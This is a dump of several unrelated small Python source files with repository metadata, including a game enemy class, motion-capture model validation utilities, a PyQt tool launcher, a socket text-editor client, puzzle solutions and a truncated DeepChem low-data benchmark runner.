    def __init__(self, name, hp, mp, str_, def_, intel=0):
        self.name = name
        self._health = hp
        self.magic = mp
        self.strength = str_
        self.defense = def_
        self.intelligence = intel
    @property
    def health(self):
        """Current health points."""
        return self._health
    @health.setter
    def health(self, health):
        """Attribute setting with validation using python getter and setter."""
        if health <= 0:
            raise ValueError("Health cannot be less than 0")
        self._health = health
    @property
    def current_hp(self):
        # Bug fix: previously read the nonexistent attribute
        # ``self.current_health`` and raised AttributeError; this is an
        # alias for ``health``.
        return self._health
    def is_alive(self):
        """Return True while the enemy's health is above 0.

        Bug fix: the old version read the undefined ``self.current_health``
        and shadowed this method by assigning ``self.is_alive = False``.
        """
        return self._health > 0
    def current_stats(self):
        """Prints a description of all enemy stats; returns None."""
        return print("Name = {}, Health = {}, Magic = {}, Strength = {}, Defense = {}, Intelligence = {}".format(self.name, self._health, self.magic, self.strength, self.defense, self.intelligence))
| [
"asingjr2@gmail.com"
] | asingjr2@gmail.com |
1f88bca8dd36585531b75d379ab5f21077a612ed | 7a3c194356437db110671ad163f03df1344a5e87 | /code/validation/common.py | 941d55ff442c7ccadd8612c3d61f2711fa5297ed | [
"MIT"
] | permissive | dmytrov/gaussianprocess | 6b181afdb989415ec929197cdb20efee571ebbcc | 7044bd2d66f44e10656fee17e94fdee0c24c70bb | refs/heads/master | 2022-12-08T22:23:11.850861 | 2020-09-14T19:37:33 | 2020-09-14T19:37:33 | 295,513,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,101 | py | import os
import time
import pickle
import logging
import numpy as np
import dataset.mocap as ds
import numerical.numpyext.logger as npl
import ml.dtw.dynamictimewarp as dtw
import matplotlib.pyplot as plt
def DTW_errors(observed, predicted):
    """
    observed : [T, N] - observed data
    predicted : [T, N] - predicted (generated by a model) data

    Returns (warp_dist_err, warp_path_mean_sqr_err): the accumulated
    dynamic-time-warping distance and the mean squared error between the
    two sequences after alignment along the optimal warping path.
    """
    N = observed.shape[1]
    # Normalisation constant; despite the name, this is the Frobenius norm
    # of the mean-centred observations, not a variance.
    var = np.sqrt(np.sum((observed - np.mean(observed, axis=0))**2))
    # Non-diagonal steps carry a small per-dimension penalty so the warp
    # prefers (1, 1) diagonal transitions.
    odist, opath = dtw.dynTimeWarp(observed / var, predicted / var,
            transitions=[(1, 1, 0.0), (0, 1, N*0.0001), (1, 0, N*0.0001)])
    warp_dist_err = odist
    # Resample both sequences along the optimal warping path before
    # computing the residual error.
    wgen = np.array([predicted[i[0]] for i in opath])
    wtra = np.array([observed[i[1]] for i in opath])
    #plt.plot(wtra[:, :3] / var, "--")
    #plt.gca().set_prop_cycle(None)
    #plt.plot(wgen[:, :3] / var)
    #plt.show()
    warp_path_mean_sqr_err = np.mean((wgen - wtra)**2)
    return warp_dist_err, warp_path_mean_sqr_err
def compute_errors(observed, predicted):
    """
    observed : [T, N] - observed data
    predicted : [T, N] - predicted (generated by a model) data
    returns : dict with keys "MSE" (mean square error of the mean-centred
        sequences), "WRAP_DYN" (time error of the warping) and "WRAP_PATH"
        (residual error after warping alignment).
    """
    # Centre both sequences before comparison.
    centred_obs = observed - np.mean(observed, axis=0)
    centred_pred = predicted - np.mean(predicted, axis=0)
    warp_dyn, warp_path_mean_sqr_err = DTW_errors(centred_obs, centred_pred)
    return {
        "MSE": np.mean((centred_obs - centred_pred) ** 2),
        "WRAP_DYN": warp_dyn,
        "WRAP_PATH": warp_path_mean_sqr_err,
    }
def all_combinations(params):
    """Cartesian product of a list of value lists, returned as lists.

    ``all_combinations([[1, 2], [3, 4]])`` -> ``[[1, 3], [1, 4], [2, 3], [2, 4]]``.
    """
    if len(params) == 1:
        return [[value] for value in params[0]]
    prefixes = all_combinations(params[:-1])
    return [prefix + [value] for prefix in prefixes for value in params[-1]]
def all_combinations_from_dict(params):
    """Expand a dict of value lists into every key/value combination,
    each combination given as zipped (key, value) pairs."""
    return [zip(params.keys(), combo) for combo in all_combinations(params.values())]
def all_combinations_from_listoftuples(params):
    """Expand a list of (key, value-list) tuples into every key/value
    combination, each combination given as zipped (key, value) pairs."""
    axis_names = [name for name, _ in params]
    axis_values = [values for _, values in params]
    return [zip(axis_names, combo) for combo in all_combinations(axis_values)]
class ModelIterator(object):
    """Iterates model training over every combination of hyper-parameter
    settings in ``params_range``, writing logs and results into a
    timestamped working directory."""
    def __init__(self):
        self.recording = None
        self.bodypart_motiontypes = None
        self.partitioner = None
        self.parts_IDs = None
        self.nparts = None
        self.trial = None
        self.settings = {}
        self.params_range = None
        # One timestamped output directory per ModelIterator instance.
        self.directory = time.strftime("%Y-%m-%d-%H.%M.%S")
    def load_recording(self, recording, bodypart_motiontypes, max_chunks=None):
        # Load data via the mocap dataset module; keeps only the first trial.
        self.recording = recording
        self.bodypart_motiontypes = bodypart_motiontypes
        self.partitioner, self.parts_IDs, trials, starts_ends = ds.load_recording(
            recording=self.recording,
            bodypart_motiontypes=bodypart_motiontypes,
            max_chunks=max_chunks)
        self.trial = trials[0]
        # Part IDs are assumed to be 0-based consecutive integers.
        self.nparts = np.max(self.parts_IDs) + 1
    def iterate_all_settings(self, func_callback, i_model=None):
        # Iterate all settings; if i_model is given, run only that single
        # combination (useful for cluster array jobs).
        for i, params in enumerate(all_combinations_from_listoftuples(self.params_range)):
            if i_model is None or i_model == i:
                try:
                    if not os.path.exists(self.directory):
                        os.makedirs(self.directory)
                    self.settings.update(params)
                    # Subdirectory name encodes the parameter combination.
                    self.settings["directory"] = self.directory + "/" + \
                        "-".join(["{}({})".format(param[0], param[1]) for param in params])
                    npl.setup_root_logger(rootlogfilename="{}/rootlog.txt".format(self.directory), removeoldlog=False)
                    pl = logging.getLogger(__name__)
                    pl.info("Working directory: " + self.settings["directory"])
                    func_callback(settings=self.settings,
                        trial=self.trial,
                        bvhpartitioner=self.partitioner)
                except (KeyboardInterrupt, SystemExit):
                    raise
                except Exception as e:
                    # Log the failure for this combination and continue with
                    # the next one.
                    npl.setup_root_logger(rootlogfilename="{}/rootlog.txt".format(self.directory), removeoldlog=False)
                    pl = logging.getLogger(__name__)
                    pl.exception(e)
class ErrorStatsReader(object):
    """Collects pickled per-run error dicts and assembles them into a
    parameter-indexed numpy tensor."""
    def __init__(self):
        self.errs = []
        self.params_range = None
        self.errorsfilename = "errors.pkl"
    def read_learned_errors_from_file(self, errfilename, param=None):
        """Load one pickled error dict; missing 'settings' is filled from
        ``param``.  Failures are reported but not raised."""
        try:
            with open(errfilename, "rb") as filehandle:
                e = pickle.load(filehandle)
                if "settings" not in e:
                    e["settings"] = param
                self.errs.append(e)
                print("Loaded {}".format(errfilename))
        # NOTE(review): bare except silently swallows every error, including
        # KeyboardInterrupt; consider narrowing to (IOError, pickle.PickleError).
        except:
            print("Failed to load {}".format(errfilename))
    def read_learned_errors(self, settings, trial, bvhpartitioner=None):
        # Callback-compatible wrapper (same signature as the training
        # callback used by ModelIterator.iterate_all_settings).
        errfilename = settings["directory"] + "/" + self.errorsfilename
        print("os.getcwd()", os.getcwd())
        self.read_learned_errors_from_file(errfilename)
    def to_tensor(self, key, params_range=None, filter=None):
        """Arrange the value under ``key`` of every loaded error dict into a
        tensor with one axis per parameter; unseen cells stay NaN.
        ``filter`` is an optional predicate over the raw error dicts."""
        if params_range is None:
            params_range = self.params_range
        a = np.nan * np.zeros([len(pr) for pn, pr in params_range])
        for s in self.errs:
            try:
                if filter is None or filter(s):
                    inds = tuple((pr.index(s["settings"][pn]) for pn, pr in params_range))
                    a[inds] = s[key]
            except (KeyError, ValueError):
                # Entry lacks this key or its setting is outside params_range.
                pass
        return a
def select_by(tensor_axes, tensor_value, params):
    """
    Slice ``tensor_value`` by fixing the axes named in ``params``.

    tensor_axes: N*(axisname, M*axisvalue)
    tensor_value: tensor with one axis per entry of tensor_axes
    params: iterable of (axisname, value) pairs to fix

    Returns (remaining_axes, sliced_data).

    Bug fix: the old version iterated ``params`` twice (once for keys, once
    for values); when callers pass an iterator such as ``zip(...)`` the
    second pass saw nothing and no axis was fixed.  ``params`` is now
    consumed exactly once.
    """
    fixed = dict(params)
    inds = tuple(
        axis_values.index(fixed[axis_name]) if axis_name in fixed else slice(None)
        for axis_name, axis_values in tensor_axes)
    res_axes = [(name, values) for name, values in tensor_axes if name not in fixed]
    res_data = tensor_value[inds]
    #res_data = np.squeeze(res_data) # no need to squeeze?
    return res_axes, res_data
def iterate_by(tensor_axes, tensor_value, iter_params_keys):
    """Yield (param_combination, remaining_axes, sliced_data) for every
    combination of values of the axes named in ``iter_params_keys``."""
    selected_range = [(name, values) for name, values in tensor_axes
                      if name in iter_params_keys]
    for combination in all_combinations_from_listoftuples(selected_range):
        sliced_axes, sliced_data = select_by(tensor_axes, tensor_value, combination)
        yield combination, sliced_axes, sliced_data
def mean_std(tensor_axes, tensor_value, alongs):
    """NaN-aware mean and standard deviation of ``tensor_value`` over the
    axes named in ``alongs``.  Returns (mean, std)."""
    axis_names = [name for name, _ in tensor_axes]
    reduce_axes = tuple(axis_names.index(along) for along in alongs)
    return (np.nanmean(tensor_value, axis=reduce_axes),
            np.nanstd(tensor_value, axis=reduce_axes))
def values_by_name(tensor_axes, name):
    """Return the value list of the axis called ``name``."""
    return dict(tensor_axes)[name]
| [
"dmytro.velychko@gmail.com"
] | dmytro.velychko@gmail.com |
c711d02dde7081b2daf943ff693527fd569f8976 | 50afc0db7ccfc6c80e1d3877fc61fb67a2ba6eb7 | /challenge8(theater_escape)/GameSwap.py | a30610d08430f0282964baf30207ac0ae6496db5 | [
"MIT"
] | permissive | banana-galaxy/challenges | 792caa05e7b8aa10aad8e04369fc06aaf05ff398 | 8655c14828607535a677e2bb18689681ee6312fa | refs/heads/master | 2022-12-26T23:58:12.660152 | 2020-10-06T13:38:04 | 2020-10-06T13:38:04 | 268,851,516 | 11 | 8 | MIT | 2020-09-22T21:21:30 | 2020-06-02T16:24:41 | Python | UTF-8 | Python | false | false | 632 | py | def whichExit(cinema):
    # Locate the empty seat (value 0).  NOTE(review): the names are swapped —
    # currentRow ends up holding the seat's COLUMN index within its row and
    # currentColumn the ROW index; row.index(sit) finds the first 0 in a row.
    currentRow, currentColumn, left, right, i = 0, 0, 0, 0, 0
    for row in cinema:
        for sit in row:
            if sit == 0: currentRow = row.index(sit); currentColumn = cinema.index(row)
    # Count occupied seats (any value other than -1) to the left and right
    # of the empty seat's column, over rows 0..currentColumn inclusive.
    for column in range(currentColumn + 1):
        for _ in cinema[column]:
            if i < currentRow:
                left += 0 if cinema[column][i] == -1 else 1
            elif i == currentRow: i += 1; continue
            else: right += 0 if cinema[column][i] == -1 else 1
            i += 1
        i = 0
    # Recommend the side with fewer people to pass; ties return "same".
    if left == right: return "same"
    elif left > right: return "right"
    else: return "left"
"cawasp@gmail.com"
] | cawasp@gmail.com |
4be069bfe0d7d032b935a0fe9cedcb43b976a562 | 60c76946c54317472326214aec8e4c40e65e557f | /apps/courses/apps.py | d4899479cca4763a1de33d02b311b8044ee98ee1 | [] | no_license | Aiyane/Xuehai | 73b3d3043016d05000dd951e5b69165c181d14c6 | 6bf67eb97c1543defaa97e2f77c7b8bd0e89bcb8 | refs/heads/master | 2020-03-23T00:26:18.065304 | 2018-07-14T12:41:30 | 2018-07-14T12:41:30 | 140,863,193 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | # -*- coding:utf-8 -*-
from django.apps import AppConfig
class CoursesConfig(AppConfig):
    """Django application configuration for the courses app."""
    name = 'courses'
    # Human-readable name shown in the Django admin (Chinese for "course").
    verbose_name = u"课程"
| [
"2310091880qq@gmail.com"
] | 2310091880qq@gmail.com |
37d8ec1c84f8b1397fcfb43e3196fa78ce8a2c30 | 40d3f558e2a7180f6ce87a74885ae6261f523201 | /SettingRTSystem/SettingRTSystem/SettingRTSystem.py | f8a98a1ba77313655a112b464c7e129cbd0ee2ca | [] | no_license | n-kawauchi/openrtm_utils | 1e1db8666dfdde335b5f9d7e1015fe4be305dd7a | 309b653075611e5668a371ff5d0820b5dd6207dc | refs/heads/master | 2020-06-13T08:21:27.789797 | 2018-03-27T23:57:41 | 2018-03-27T23:57:41 | 194,598,946 | 0 | 0 | null | 2019-07-01T04:20:49 | 2019-07-01T04:20:49 | null | UTF-8 | Python | false | false | 2,644 | py | #!/bin/env python
# -*- encoding: utf-8 -*-
##
# @file SettingRTCConf.py
# @brief 複合コンポーネント作成支援ツール
import thread
import sys,os,platform
import re
import time
import random
import commands
import math
import imp
import subprocess
import rtctree.tree
import RTC
import OpenRTM_aist
from OpenRTM_aist import CorbaNaming
from OpenRTM_aist import RTObject
from OpenRTM_aist import CorbaConsumer
from omniORB import CORBA
import CosNaming
from PyQt4 import QtCore, QtGui
import SettingRTCWindow.MainWindow
import SettingRTSystem_rc
# Resolve the OpenRTM installation root from the RTM_ROOT environment
# variable, falling back to the current directory (Windows-style path).
if "RTM_ROOT" in os.environ:
    rtm_root = os.environ["RTM_ROOT"]
else:
    rtm_root = ".\\"
##
# @brief Main function (translated from Japanese)
def main():
    """Entry point: launch the rtcConfSet helper process for the current
    platform, run the Qt main window event loop, then spawn exitRTCs.py to
    shut down the started RT components."""
    #mgrc = ManagerControl("")
    app = QtGui.QApplication([""])
    #splash_pix = QtGui.QPixmap(':/images/splash_loading.png')
    #splash = QtGui.QSplashScreen(splash_pix, QtCore.Qt.WindowStaysOnTopHint)
    #splash.setMask(splash_pix.mask())
    #splash.show()
    #app.processEvents()
    # Tool install path; falls back to the working directory.
    if "SettingRTSystemPath" in os.environ:
        tool_path = os.environ["SettingRTSystemPath"]
    else:
        tool_path = "./"
    if os.name == 'posix':
        #process_rtcd = subprocess.Popen("python Manager/Python/rtcd.py -f Manager/Python/rtc.conf".split(" "))
        cmd = "sh " + str(os.path.join(tool_path,"rtcConfSet.sh"))
        process_confset = subprocess.Popen(cmd.split(" "))
        #process_confset = os.system("sh rtcConfSet.sh&")
    elif os.name == 'nt':
        #process_rtcd = subprocess.Popen("python Manager/Python/rtcd.py -f Manager/Python/rtc.conf")
        #process_rtcd = os.system("start python Manager/Python/rtcd.py -f Manager/Python/rtc.conf")
        # TOOLEXE=TRUE means a frozen .exe distribution is used instead of
        # running the helper script through the Python interpreter.
        if "TOOLEXE" in os.environ and os.environ["TOOLEXE"]=="TRUE":
            cmd = "\""+str(os.path.join(rtm_root,"utils\\python_dist","rtcConfSet.exe"))+"\" -f rtc.conf"
        else:
            cmd = "python " + "\""+str(os.path.join(tool_path,"rtcConfSet\\rtcConfSet.py"))+"\" -f rtc.conf"
        cmd = cmd.replace("/","\\")
        process_confset = subprocess.Popen(cmd)
        #process_confset = os.system("start rtcConfSet.bat")
    mainWin = SettingRTCWindow.MainWindow.MainWindow()
    mainWin.show()
    #splash.finish(mainWin)
    app.exec_()
    # After the GUI exits, clean up the spawned RT components.
    if os.name == 'posix':
        cmd = "python " + str(os.path.join(tool_path,"exitRTCs.py"))
        subprocess.Popen(cmd.split(" "))
    elif os.name == 'nt':
        cmd = "python " + "\""+str(os.path.join(tool_path,"exitRTCs.py"))+"\""
        subprocess.Popen(cmd)
if __name__ == "__main__":
    main()
| [
"TyouKyozyakuTaisitu@yahoo.co.jp"
] | TyouKyozyakuTaisitu@yahoo.co.jp |
05d2b69daf2bd2f12575ea0d0a55ca2d755e4171 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02954/s152942454.py | 4b7a332bd983d684b4ceffe3f57347d3e95b1dc6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | S = input() + 'R'
# Competitive-programming solution (appears to be AtCoder "Gathering
# Children"-style): S consists of 'R'/'L' moves; after a huge number of
# steps all children gather at each R...L boundary, splitting between the
# two boundary cells by parity of their starting distance.  A sentinel 'R'
# was appended to S above to flush the final L-run.
R = 0
L = 0
ans = [0] * (len(S))
for i in range(len(S)):
    if S[i] == 'R':
        R += 1
        # An 'R' after an L-run closes the previous block: distribute the
        # L-run children onto the two cells at its left boundary.
        if L > 0:
            ans[i - L] += (L + 1) // 2
            ans[i - L - 1] += L // 2
            L = 0
    elif S[i] == 'L':
        L += 1
        # First 'L' after an R-run: distribute the R-run children onto the
        # two cells at the R/L boundary.
        if R > 0:
            ans[i] += R // 2
            ans[i - 1] += (R + 1)// 2
            R = 0
# Drop the count for the sentinel cell before printing.
print(*ans[:-1])
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
f7cb01407737d3666553798bf4aa5a31c452c46f | bc2a85e8dd9244f89e2f1801cc19d570a87c74ed | /CompanyChallenges/company_sp/src/main.py | 5debbfa2009478435dd06d18b476596672888341 | [] | no_license | christian-miljkovic/interview | 1cab113dbe0096e860a3ae1d402901a15e808e32 | 63baa1535b788bc3e924f3c24a799bade6a2eae3 | refs/heads/master | 2023-01-11T14:53:09.304307 | 2020-02-04T17:35:12 | 2020-02-04T17:35:12 | 193,549,798 | 0 | 0 | null | 2023-01-05T05:56:15 | 2019-06-24T17:28:50 | Python | UTF-8 | Python | false | false | 5,406 | py | # import socket library
import socket
import sys
import collections
class Cursor(object):
    """Tracks a text cursor position on a 2D character screen and renders
    it as a 'rect' drawing command (8x14 pixel cell)."""
    def __init__(self, screen):
        self.top_pad = 0
        self.left_pad = 0
        self.color = '#0000ff'
        # Pixel size of one character cell; used to convert (row, col) to
        # pixel offsets in pos_to_command().
        self.pixel_size = {'width':8, 'height':14}
        # 2D array representing screen
        self.screen = screen
        self.pos = {'row':0, 'col':0}
        self.at_end = True
    def move(self, command):
        """Dispatch a direction name ('right'/'left'/'up'/'down')."""
        if command == 'right':
            self.move_right()
        elif command == 'left':
            self.move_left()
        elif command == 'up':
            self.move_up()
        elif command == 'down':
            self.move_down()
    def move_up(self):
        curr_row = self.pos['row']
        curr_col = self.pos['col']
        if curr_row - 1 >= 0:
            # NOTE(review): only snaps to the end of the previous row when
            # the cursor is exactly at column 1 — looks like it was meant to
            # clamp whenever the row above is shorter; confirm intent.
            if curr_col - 1 == 0:
                self.pos['col'] = len(self.screen[curr_row - 1]) - 1
            self.pos['row'] -= 1
    def move_down(self):
        curr_row = self.pos['row']
        curr_col = self.pos['col']
        if curr_row + 1 < len(self.screen):
            # Clamp the column when the row below is shorter.
            if curr_col > len(self.screen[curr_row + 1]):
                self.pos['col'] = len(self.screen[curr_row + 1]) - 1
            self.pos['row'] += 1
    def move_right(self):
        curr_row= self.pos['row']
        curr_col = self.pos['col']
        if curr_row < len(self.screen) and curr_col < len(self.screen[curr_row]) - 1:
            self.pos['col'] += 1
        else:
            # Past end of line: wrap to the next row (column unchanged).
            self.move_down()
    def move_left(self):
        curr_row = self.pos['row']
        curr_col = self.pos['col']
        if curr_row < len(self.screen) and curr_col - 1 >= 0:
            self.pos['col'] -= 1
        elif curr_row - 1 >= 0:
            # At column 0: wrap to the end of the previous row.
            self.pos['row'] -= 1
            self.pos['col'] = len(self.screen[curr_row - 1]) - 1
    def flatten_position(self):
        # Map (row, col) to an index into the flat character array,
        # assuming every row has the width of row 0 — TODO confirm this
        # holds after line wrapping.
        return (len(self.screen[0]) * self.pos['row'] + self.pos['col']) - 1
    def pos_to_command(self):
        """Render the cursor as a 'rect,left,top,w,h,color' command string."""
        top_pad = self.pos['row'] * self.pixel_size['height']
        left_pad = self.pos['col'] * self.pixel_size['width']
        return 'rect,{},{},8,14,#FF0000\n'.format(left_pad, top_pad)
class TextEditor(object):
    """Minimal editor model: keystrokes accumulate in a flat character list
    (``self.arr``) which is re-laid-out into ``self.screen`` (list of rows)
    on every render."""
    def __init__(self):
        self.screen = [[""]]
        self.arr = []
        self.screen_width = 800
        self.screen_height = 600
        self.cursor = Cursor(self.screen)
        # False while the user is navigating with arrow keys, so layout does
        # not overwrite the manually moved cursor.
        self.update_cursor = True
        # Named keys mapped to the character they insert.
        self.commands = {'return':'\n', 'space': ' '}
    def perform_command(self, command):
        """Apply a parsed 'key' or 'window' namedtuple from parse_data()."""
        if type(command).__name__ == 'key':
            if command.value in ['left','right','up','down']:
                self.cursor.move(command.value)
                self.update_cursor = False
            else:
                self.generic_key_down(command.value)
        elif type(command).__name__ == 'window':
            self.screen_width = command.width
            self.screen_height = command.height
    def generic_key_down(self, value):
        """Insert a character at the cursor's flattened position (append
        when the cursor is at the end of the buffer)."""
        insert_value = value
        if value in self.commands:
            insert_value = self.commands[value]
        index = self.cursor.flatten_position()
        if index < len(self.arr) - 1:
            self.arr.insert(index, insert_value)
        else:
            self.arr.append(insert_value)
    def array_to_screen(self):
        """Re-flow self.arr into self.screen rows, handling backspace,
        newlines and pixel-width wrapping; replays the resulting moves onto
        the cursor when update_cursor is set."""
        row = 0
        cursor_commands = []
        wrap_count = 0
        for index, char in enumerate(self.arr):
            # NOTE(review): debug print left in the hot path.
            print(wrap_count * 8, self.screen_width)
            if 'backspac' in char:
                if len(self.screen[row]) == 1:
                    if row != 0:
                        del self.screen[row]
                        cursor_commands.append('up')
                        row -= 1
                else:
                    self.screen[row].pop()
                    cursor_commands.append('left')
                # NOTE(review): deleting from self.arr while enumerating it
                # skips the element after the deletion point — verify.
                del self.arr[index]
                if index - 1 >= 0:
                    del self.arr[index-1]
                wrap_count -= 1
            # Start a new row on newline or when the line exceeds the
            # window width (8 px per character cell).
            elif char == '\n' or wrap_count * 8 >= self.screen_width:
                self.screen.append([''])
                cursor_commands.append('down')
                row += 1
                wrap_count = 0
            else:
                self.screen[row].append(char)
                cursor_commands.append('right')
                wrap_count += 1
        if self.update_cursor:
            self.cursor.screen = self.screen
            for cursor_mov in cursor_commands:
                self.cursor.move(cursor_mov)
    def render(self):
        """Rebuild the screen and return the draw-command string: 'clear',
        one 'text' line per row (14 px line height), then the cursor rect."""
        # Resume auto-cursor tracking once the cursor is back at the end of
        # the text.
        if self.cursor.pos['row'] == len(self.screen)-1 and self.cursor.pos['col'] == len(self.screen[-1])-1:
            self.update_cursor = True
        self.screen = [[""]]
        self.array_to_screen()
        text_on_screen = 'clear\n'
        top_pad = 0
        left_pad = 0
        for row in self.screen:
            text = ''.join(row)
            text_on_screen += 'text,0,{},#000000,{}\n'.format(top_pad, text)
            top_pad += 14
        text_on_screen += self.cursor.pos_to_command()
        return text_on_screen
def parse_data(data):
    """Parse one raw client message into a command namedtuple.

    Returns a ``key`` tuple for "keydown,<value>" messages, a ``window``
    tuple for "resize,<width>,<height>" messages, and None for anything
    else.  The tuple type names are significant: TextEditor dispatches on
    ``type(command).__name__``.
    """
    fields = data.strip('\n').lower().split(',')
    if len(fields) == 2 and fields[0] == 'keydown':
        Key = collections.namedtuple('key', ['value'])
        return Key(fields[1])
    if len(fields) == 3 and 'resize' in fields[0]:
        Window = collections.namedtuple('window', ['width', 'height'])
        return Window(int(fields[1]), int(fields[2]))
# Create a socket for the server on localhost
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('localhost',5005)
client_socket.connect(server_address)
text_editor = TextEditor()
# Event loop: read one message from the server, apply it to the editor,
# then send the full redraw command list back.
# NOTE(review): recv(16) can split long messages, and on Python 3 it
# returns bytes while parse_data expects str — this appears to target
# Python 2; confirm.
while True:
    data = client_socket.recv(16)
    command = parse_data(data)
    if command:
        text_editor.perform_command(command)
    client_socket.send(text_editor.render())
| [
"cmm892@stern.nyu.edu"
] | cmm892@stern.nyu.edu |
27cc29c1b018fb31b488d657b6253e7b2e3dd98b | 08a68e32dc80f99a37a30ddbbf943337546cc3d5 | /.history/count/views_20200419210126.py | 7d44fedad1258f480a5d74dbc0f4f7fcd2ccf24d | [] | no_license | Space20001/word-count-project | dff1b4b44d2f7230070eef0d95dd968b655d92f7 | 795b5e8ad5c59109e96bf7a8e9192efaefa7770e | refs/heads/master | 2022-04-20T17:54:05.511449 | 2020-04-20T15:25:46 | 2020-04-20T15:25:46 | 257,327,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | from django.shortcuts import render
# Create your views here.
def home(request):
    """Render the word-count input form."""
    return render(request, 'count/home.html', {})
def counted(request):
    """Count the words submitted from the home form and render the result.

    Reads ``fulltext`` from the GET query string, splits it on whitespace,
    and passes the total word count plus a per-word frequency table to the
    template.
    """
    fulltext = request.GET['fulltext']
    wordlist = fulltext.split()
    # Bug fix: the original loop was syntactically broken (a bare
    # ``worddictionary`` expression and empty if/else bodies).  Build a
    # word -> occurrence-count mapping instead.
    worddictionary = {}
    for word in wordlist:
        worddictionary[word] = worddictionary.get(word, 0) + 1
    return render(request, 'count/counted.html',
                  {'fulltext': fulltext,
                   'count': len(wordlist),
                   'worddictionary': worddictionary.items()})
def about(request):
    """Render the static about page."""
    # Bug fix: the context key was the function object ``about`` rather
    # than the string 'about', which Django templates cannot look up.
    return render(request, 'count/about.html', {'about': 'about'})
| [
"steve.h@blueyonder.com"
] | steve.h@blueyonder.com |
9e7e128d4c376e8aa17e5ff01c2b2c8a16b2cbab | 2db7597686f33a0d700f7082e15fa41f830a45f0 | /Python/巨硬/A37.区间问题-并集.py | 2c9d8793447aa0422993aab6fd38fe6b6ec1ba3e | [] | no_license | Leahxuliu/Data-Structure-And-Algorithm | 04e0fc80cd3bb742348fd521a62bc2126879a70e | 56047a5058c6a20b356ab20e52eacb425ad45762 | refs/heads/master | 2021-07-12T23:54:17.785533 | 2021-05-17T02:04:41 | 2021-05-17T02:04:41 | 246,514,421 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | '''
给定一个interval A和一组intervals,然后判断这组intervals里面是否存在一个并集是这个A的超集
'''
'''
[[2, 4], [5, 6],[3,5]]
[1, 4]
一组intervals合并之后,并没有一个区间是可以把[1,4]包括在里面的
'''
# merge
# 56
def merge(intervals):
    """Merge overlapping [start, end] intervals (LeetCode 56 style).

    Returns a new list of intervals sorted by start, where any pair of
    touching or overlapping inputs has been fused into one interval.
    """
    if len(intervals) < 2:
        return intervals
    ordered = sorted(intervals, key=lambda pair: pair[0])
    merged = [ordered[0]]
    for begin, finish in ordered[1:]:
        last = merged[-1]
        if begin <= last[1]:
            # Overlaps (or touches) the previous interval: extend it.
            last[1] = max(last[1], finish)
        else:
            merged.append([begin, finish])
    return merged
# include or not
# 1288
def covered(A, intervals):
    """Return True if any single interval fully contains A (LC 1288 style)."""
    return any(start <= A[0] and A[1] <= end for start, end in intervals)
# Quick demo: merge the sample intervals, then check whether two query
# ranges are contained in any single merged interval.
intervals = merge([[2, 4], [5, 6],[3,5]])
print(intervals)
print(covered([1, 4], intervals))
print(covered([2, 6], intervals))
"leahxuliu@gmail.com"
] | leahxuliu@gmail.com |
8bf45cd71206323b9373447e206269a9e9297742 | 9678fc0229de38f419964247ba0c8c8c395756c6 | /deepchem/molnet/run_benchmark_low_data.py | 840bbc53115f807459fd91aab7eb0417f47772ed | [
"MIT"
] | permissive | ozgurozkan123/deepchem | 2c3af9022de583b7dc77affce599dfb7b3a0dd81 | 7b6248db5f7172ff2a833a1c7c99f48565befe67 | refs/heads/master | 2023-01-23T11:40:34.545571 | 2017-09-28T21:41:53 | 2017-09-28T21:41:53 | 105,562,133 | 0 | 0 | MIT | 2020-11-14T23:00:38 | 2017-10-02T17:14:51 | Python | UTF-8 | Python | false | false | 4,981 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 06 14:25:40 2017
@author: Zhenqin Wu
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import os
import time
import csv
import numpy as np
import tensorflow as tf
import deepchem
from deepchem.molnet.run_benchmark_models import low_data_benchmark_classification
from deepchem.molnet.check_availability import CheckFeaturizer
def run_benchmark_low_data(datasets,
                           model,
                           split='task',
                           metric=None,
                           featurizer=None,
                           n_features=0,
                           out_path='.',
                           K=4,
                           hyper_parameters=None,
                           cross_valid=False,
                           seed=123):
  """
  Run low data benchmark test on designated datasets
  with deepchem(or user-defined) model

  Parameters
  ----------
  datasets: list of string
    choice of which datasets to use, should be: muv, tox21, sider
  model: string or user-defined model stucture
    choice of which model to use, should be: siamese, attn, res
  split: string, optional (default='task')
    choice of splitter function, only task splitter supported
  metric: string, optional (default=None)
    choice of evaluation metrics, None = using the default metrics(AUC)
  featurizer: string or dc.feat.Featurizer, optional (default=None)
    choice of featurization, None = using the default corresponding to model
    (string only applicable to deepchem models)
  n_features: int, optional(default=0)
    depending on featurizers, redefined when using deepchem featurizers,
    need to be specified for user-defined featurizers(if using deepchem models)
  out_path: string, optional(default='.')
    path of result file
  K: int, optional(default=4)
    K-fold splitting of datasets
  hyper_parameters: dict, optional (default=None)
    hyper parameters for designated model, None = use preset values
  cross_valid: boolean, optional(default=False)
    whether to cross validate
  seed: int, optional(default=123)
    random seed forwarded to the low-data benchmark model
  """
  for dataset in datasets:
    # Only classification low-data benchmarks are supported.
    if dataset in ['muv', 'sider', 'tox21']:
      mode = 'classification'
      if metric == None:
        metric = str('auc')
    else:
      raise ValueError('Dataset not supported')

    metric_all = {
        'auc': deepchem.metrics.Metric(deepchem.metrics.roc_auc_score, np.mean)
    }
    if isinstance(metric, str):
      metric = metric_all[metric]

    if featurizer == None and isinstance(model, str):
      # Assigning featurizer if not user defined
      pair = (dataset, model)
      if pair in CheckFeaturizer:
        featurizer = CheckFeaturizer[pair][0]
        n_features = CheckFeaturizer[pair][1]
      else:
        continue

    loading_functions = {
        'muv': deepchem.molnet.load_muv,
        'sider': deepchem.molnet.load_sider,
        'tox21': deepchem.molnet.load_tox21
    }

    assert split == 'task'
    print('-------------------------------------')
    print('Benchmark on dataset: %s' % dataset)
